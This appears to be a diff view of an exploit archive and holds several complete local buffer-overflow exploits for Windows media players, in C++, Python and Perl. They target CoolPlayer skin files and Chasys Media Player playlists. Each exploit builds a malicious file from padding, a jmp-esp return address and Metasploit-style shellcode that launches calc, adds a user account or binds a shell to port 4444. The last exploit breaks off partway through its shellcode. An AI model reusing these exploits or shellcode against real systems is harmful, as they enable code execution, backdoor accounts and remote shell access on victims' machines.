"\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x33\x45\x58\x42\x4c\x4a\x47"
"\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x38\x42\x47\x4e\x31\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x30\x4b\x38\x4a\x36\x4e\x53\x4f\x35\x41\x53"
"\x48\x4f\x42\x46\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
"\x42\x45\x4a\x46\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x36\x43\x46\x50\x32\x45\x46\x4a\x37\x45\x46\x42\x30\x5a";
char buffer[1918];
char eip[] = "\x27\x38\x03\x7d"; //jmp esp
cout << "[*] Generating payload\n";
strcpy(buffer, "[CoolPlayer Skin]\nPlaylistSkin=");
int i;
for (i=0; i<1534; i++)
buffer[31+i] = 'A';
for (i=0; i<sizeof(eip); i++)
buffer[1565+i] = eip[i];
for (i=0; i<sizeof(scode); i++)
buffer[1569+i] = scode[i];
ofstream outStream;
outStream.open("cp.ini");
outStream << buffer;
outStream.close();
cout << "[+] Skin file created.\n";
return 0;
}
// milw0rm.com [2008-12-21]
/*
* CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit
*
* Advisory: http://www.bmgsec.com.au/advisory/43/
* Test box: WinXP Pro SP2 English
*
* Code reference is in skin.c, lines 464 - 480
*
* Written and discovered by:
* r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
*/
#include <iostream>
#include <fstream>
#include <cstdlib> //exit
using namespace std;
int main()
{
//win32_exec - EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
//Bad characters: 0x00, 0x0d, 0xf4
char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x53\x4b\x38\x4e\x57"
"\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x38"
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x48"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x38"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x38\x4e\x30\x4b\x54"
"\x4b\x38\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58"
"\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x33\x45\x58\x42\x4c\x4a\x47"
"\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x38\x42\x47\x4e\x31\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x30\x4b\x38\x4a\x36\x4e\x53\x4f\x35\x41\x53"
"\x48\x4f\x42\x46\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
"\x42\x45\x4a\x46\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x36\x43\x46\x50\x32\x45\x46\x4a\x37\x45\x46\x42\x30\x5a";
char buffer[1918];
char eip[] = "\x27\x38\x03\x7d"; //jmp esp
cout << "[*] Generating payload\n";
strcpy(buffer, "[CoolPlayer Skin]\nPlaylistSkin=");
int i;
for (i=0; i<1534; i++)
buffer[31+i] = 'A';
for (i=0; i<sizeof(eip); i++)
buffer[1565+i] = eip[i];
for (i=0; i<sizeof(scode); i++)
buffer[1569+i] = scode[i];
ofstream outStream;
outStream.open("cp.ini");
outStream << buffer;
outStream.close();
cout << "[+] Skin file created.\n";
return 0;
}
// milw0rm.com [2008-12-21]

128
platforms/windows/local/7547.py
View file

@ -1,64 +1,64 @@
# CoolPlayer (Skin) Buffer Overflow
# maybe all versions are affected :)
# By:Encrypt3d.M!nd
#
# Orginal Exploit: by r0ut3r
# http://www.milw0rm.com/exploits/7536
#
# i've test it on my box(winxp sp3) and didn't work
# so i've re-wrote the exploit and this is workin
# tested: Windows xp sp3 patched
# version tested:2.17,2.18,2.19
#
# Greetz:-=Mizo=-,L!0n,El Mariachi,MiNi SpIder,GGy,and all my friends
###################################################
chars = "A"*1511
eip = "\x6B\x8C\x49\x7E" #user32.dll jmp esp
header = "[CoolPlayer Skin]\nPlaylistSkin="
# win32_adduser - PASS=t35t EXITFUNC=seh USER=t35t Size=489
Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x57"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38"
"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x45\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"
"\x4b\x58\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58"
"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x43\x45\x38\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x38\x42\x37\x4e\x41\x4d\x4a"
"\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b"
"\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x33\x4f\x35\x41\x33"
"\x48\x4f\x42\x56\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x47"
"\x42\x35\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x46\x4d\x46"
"\x46\x36\x50\x42\x45\x36\x4a\x37\x45\x56\x42\x52\x4f\x42\x43\x56"
"\x42\x42\x50\x36\x45\x46\x46\x57\x42\x52\x45\x47\x43\x47\x45\x46"
"\x44\x37\x42\x32\x46\x47\x43\x43\x45\x43\x46\x57\x42\x52\x46\x47"
"\x43\x43\x45\x33\x46\x47\x42\x42\x4f\x32\x41\x34\x46\x54\x46\x54"
"\x42\x52\x48\x42\x48\x32\x42\x42\x50\x46\x45\x36\x46\x57\x42\x32"
"\x4e\x36\x4f\x56\x43\x46\x41\x36\x4e\x36\x47\x56\x44\x37\x4f\x36"
"\x45\x37\x42\x37\x42\x32\x41\x44\x46\x46\x4d\x56\x49\x56\x50\x56"
"\x49\x46\x43\x57\x46\x57\x44\x57\x41\x56\x46\x37\x4f\x46\x44\x37"
"\x43\x57\x42\x42\x46\x37\x43\x33\x45\x53\x46\x47\x42\x52\x4f\x52"
"\x41\x54\x46\x34\x46\x34\x42\x50\x5a");
poc = (header+chars+eip+"\x90"*10+shellcode)
file = open('skin.ini','w+')
file.write(poc)
file.close()
# milw0rm.com [2008-12-22]
# CoolPlayer (Skin) Buffer Overflow
# maybe all versions are affected :)
# By:Encrypt3d.M!nd
#
# Orginal Exploit: by r0ut3r
# http://www.milw0rm.com/exploits/7536
#
# i've test it on my box(winxp sp3) and didn't work
# so i've re-wrote the exploit and this is workin
# tested: Windows xp sp3 patched
# version tested:2.17,2.18,2.19
#
# Greetz:-=Mizo=-,L!0n,El Mariachi,MiNi SpIder,GGy,and all my friends
###################################################
chars = "A"*1511
eip = "\x6B\x8C\x49\x7E" #user32.dll jmp esp
header = "[CoolPlayer Skin]\nPlaylistSkin="
# win32_adduser - PASS=t35t EXITFUNC=seh USER=t35t Size=489
Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x57"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38"
"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x45\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"
"\x4b\x58\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58"
"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x43\x45\x38\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x38\x42\x37\x4e\x41\x4d\x4a"
"\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b"
"\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x33\x4f\x35\x41\x33"
"\x48\x4f\x42\x56\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x47"
"\x42\x35\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x46\x4d\x46"
"\x46\x36\x50\x42\x45\x36\x4a\x37\x45\x56\x42\x52\x4f\x42\x43\x56"
"\x42\x42\x50\x36\x45\x46\x46\x57\x42\x52\x45\x47\x43\x47\x45\x46"
"\x44\x37\x42\x32\x46\x47\x43\x43\x45\x43\x46\x57\x42\x52\x46\x47"
"\x43\x43\x45\x33\x46\x47\x42\x42\x4f\x32\x41\x34\x46\x54\x46\x54"
"\x42\x52\x48\x42\x48\x32\x42\x42\x50\x46\x45\x36\x46\x57\x42\x32"
"\x4e\x36\x4f\x56\x43\x46\x41\x36\x4e\x36\x47\x56\x44\x37\x4f\x36"
"\x45\x37\x42\x37\x42\x32\x41\x44\x46\x46\x4d\x56\x49\x56\x50\x56"
"\x49\x46\x43\x57\x46\x57\x44\x57\x41\x56\x46\x37\x4f\x46\x44\x37"
"\x43\x57\x42\x42\x46\x37\x43\x33\x45\x53\x46\x47\x42\x52\x4f\x52"
"\x41\x54\x46\x34\x46\x34\x42\x50\x5a");
poc = (header+chars+eip+"\x90"*10+shellcode)
file = open('skin.ini','w+')
file.write(poc)
file.close()
# milw0rm.com [2008-12-22]

190
platforms/windows/local/7692.pl
View file

@ -1,95 +1,95 @@
#!/usr/bin/perl
# coolplayer_bof.pl
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
#
# CoolPlayer BUILD 219 'PlaylistSkin' Buffer Overflow Exploit
# http://coolplayer.sourceforge.net
#
# TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING
#
# C:\Documents and Settings\Administrator> telnet localhost 4444
# .....
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# ANDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
#
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# Some fun, good 'ole win32 smashing.. bada-bing bada-boom!
$header = "[CoolPlayer Skin]\nPlaylistSkin=";
$win2ksp4 = 0x77E4307B; # user32.dll JMP ESP
$winxpsp3 = 0x7E498C6B; # user32.dll JMP ESP
# Win32 Portbind Shellcode (pexalphanum/metasploit,port=4444)
$shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" .
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" .
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" .
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" .
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" .
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48" .
"\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x54\x4e\x33\x4b\x38\x4e\x37" .
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x41\x4b\x48" .
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x58" .
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" .
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" .
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48" .
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54" .
"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x32\x4b\x38" .
"\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d" .
"\x46\x46\x4b\x58\x43\x44\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48" .
"\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x50\x35\x4a\x36" .
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56" .
"\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x57\x43\x57" .
"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" .
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e" .
"\x48\x56\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30" .
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55" .
"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x55\x43\x55\x43\x45\x43\x44" .
"\x43\x35\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x31" .
"\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x56\x46\x4a" .
"\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x51" .
"\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32" .
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d" .
"\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d" .
"\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46" .
"\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45" .
"\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x46\x4a\x46\x43\x56" .
"\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x42\x4e\x4c" .
"\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x38\x44\x4e\x41\x33\x42\x4c" .
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x44\x4e\x32" .
"\x43\x39\x4d\x38\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" .
"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f" .
"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x35\x4c\x56" .
"\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56" .
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36" .
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" .
"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" .
"\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x35\x4f\x4f\x48\x4d" .
"\x4f\x4f\x42\x4d\x5a";
$filename = $ARGV[0];
$target = $ARGV[1];
if(!defined($filename) || !defined($target))
{
print "Usage: $0 <filename.ini> [1=win2ksp4/2=winxpsp3]\n";
}
if($target == "1") { $retaddr = pack('l', $win2ksp4); }
if($target == "2") { $retaddr = pack('l', $winxpsp3); }
$payload = $header . $retaddr x 377 . $shellcode; # 377 * 4 = 1508
open(FILE, '>' . $filename);
print FILE $payload;
close(FILE);
exit;
# milw0rm.com [2009-01-07]
#!/usr/bin/perl
# coolplayer_bof.pl
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
#
# CoolPlayer BUILD 219 'PlaylistSkin' Buffer Overflow Exploit
# http://coolplayer.sourceforge.net
#
# TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING
#
# C:\Documents and Settings\Administrator> telnet localhost 4444
# .....
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# ANDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
#
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# Some fun, good 'ole win32 smashing.. bada-bing bada-boom!
$header = "[CoolPlayer Skin]\nPlaylistSkin=";
$win2ksp4 = 0x77E4307B; # user32.dll JMP ESP
$winxpsp3 = 0x7E498C6B; # user32.dll JMP ESP
# Win32 Portbind Shellcode (pexalphanum/metasploit,port=4444)
$shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" .
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" .
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" .
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" .
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" .
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48" .
"\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x54\x4e\x33\x4b\x38\x4e\x37" .
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x41\x4b\x48" .
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x58" .
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" .
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" .
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48" .
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54" .
"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x32\x4b\x38" .
"\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d" .
"\x46\x46\x4b\x58\x43\x44\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48" .
"\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x50\x35\x4a\x36" .
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56" .
"\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x57\x43\x57" .
"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" .
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e" .
"\x48\x56\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30" .
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55" .
"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x55\x43\x55\x43\x45\x43\x44" .
"\x43\x35\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x31" .
"\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x56\x46\x4a" .
"\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x51" .
"\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32" .
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d" .
"\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d" .
"\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46" .
"\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45" .
"\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x46\x4a\x46\x43\x56" .
"\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x42\x4e\x4c" .
"\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x38\x44\x4e\x41\x33\x42\x4c" .
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x44\x4e\x32" .
"\x43\x39\x4d\x38\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" .
"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f" .
"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x35\x4c\x56" .
"\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56" .
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36" .
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" .
"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" .
"\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x35\x4f\x4f\x48\x4d" .
"\x4f\x4f\x42\x4d\x5a";
$filename = $ARGV[0];
$target = $ARGV[1];
if(!defined($filename) || !defined($target))
{
print "Usage: $0 <filename.ini> [1=win2ksp4/2=winxpsp3]\n";
}
if($target == "1") { $retaddr = pack('l', $win2ksp4); }
if($target == "2") { $retaddr = pack('l', $winxpsp3); }
$payload = $header . $retaddr x 377 . $shellcode; # 377 * 4 = 1508
open(FILE, '>' . $filename);
print FILE $payload;
close(FILE);
exit;
# milw0rm.com [2009-01-07]

124
platforms/windows/local/8233.py
View file

@ -1,62 +1,62 @@
#usage: exploit.py
print "**************************************************************************"
print " Chasys Media Player(pls File) Local Stack overflow Exploit\n"
print " Founder: zAx my friend :)"
print " Exploited by : His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Good news : The program didn't crash after running the exploit :)"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)\n"
print "**************************************************************************"
header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A"
header += "\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74"
header += "\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65"
header += "\x31\x3D"
buff1 = "\x41" * 260
eip = "\x5D\x38\x82\x7C" # call esp kernel32.dll
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x34\x4e\x33\x4b\x48\x4e\x37"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x53\x4b\x58"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x48"
"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x34"
"\x4b\x38\x4f\x55\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x31\x4b\x38"
"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x53"
"\x42\x4c\x46\x36\x4b\x48\x42\x54\x42\x43\x45\x38\x42\x4c\x4a\x57"
"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x31\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x50\x4b\x58\x4a\x56\x4e\x33\x4f\x55\x41\x53"
"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x47"
"\x42\x55\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x36\x4a\x59"
